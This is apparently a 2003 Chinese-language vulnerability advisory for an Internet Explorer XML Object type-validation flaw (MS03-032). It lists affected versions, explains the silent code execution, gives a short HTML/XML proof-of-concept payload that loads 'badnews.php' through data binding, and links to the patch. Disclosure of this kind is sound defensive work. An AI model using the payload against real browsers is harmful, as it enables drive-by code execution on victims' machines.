|
|
Microsoft Internet Explorer XML页面Object类型验证漏洞
发布时间:2003-09-08
更新时间:2003-09-08
严重程度:中
威胁程度:普通用户访问权限
错误类型:访问验证错误
利用方式:客户机模式
BUGTRAQ ID:8565
受影响系统Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0
-Microsoft Windows NT Terminal Server 4.0 SP1
-Microsoft Windows NT Terminal Server 4.0 SP2
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1 SP1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0
-Microsoft Windows NT Terminal Server 4.0 SP1
-Microsoft Windows NT Terminal Server 4.0 SP2
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.0.1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows 98SE
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP2
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows 98SE
-Microsoft Windows ME
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0
-Microsoft Windows NT Terminal Server 4.0 SP1
-Microsoft Windows NT Terminal Server 4.0 SP2
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5 SP1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0
-Microsoft Windows NT Terminal Server 4.0 SP1
-Microsoft Windows NT Terminal Server 4.0 SP2
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 5.5
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 95
-Microsoft Windows 98
+Microsoft Windows ME
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0
-Microsoft Windows NT Terminal Server 4.0 SP1
-Microsoft Windows NT Terminal Server 4.0 SP2
-Microsoft Windows NT Terminal Server 4.0 SP3
-Microsoft Windows NT Terminal Server 4.0 SP4
-Microsoft Windows NT Terminal Server 4.0 SP5
-Microsoft Windows NT Terminal Server 4.0 SP6
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Terminal Services
-Microsoft Windows 2000 Terminal Services SP1
-Microsoft Windows 2000 Terminal Services SP2
-Microsoft Windows 98
-Microsoft Windows 98SE
-Microsoft Windows ME
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Terminal Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0 SP6a
+Microsoft Windows Server 2003 Datacenter Edition
+Microsoft Windows Server 2003 Datacenter Edition 64-bit
+Microsoft Windows Server 2003 Enterprise Edition
+Microsoft Windows Server 2003 Enterprise Edition 64-bit
+Microsoft Windows Server 2003 Standard Edition
+Microsoft Windows Server 2003 Web Edition 详细描述
Internet Explorer在显示XML页面时没有正确检查文件中的Object类型,可能导致在客户机上执行恶意代码。当IE收到服务器的XML文件时,在处理Object标记过程中,没有对在弹出窗口中包含的data命令指向的文件类型做充分的检查,文件将在没有任何提示的情况下被执行。
测试代码
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnews.php"></object>
]]>
</exploit>
</security>
</xml>
解决方案
厂商已经发布了MS03-032公告及累计补丁以解决此安全漏洞:
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
相关信息
EEYE: Internet Explorer Object Data Remote Execution Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-08/0309.html
Microsoft Security Bulletin MS03-032
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
|
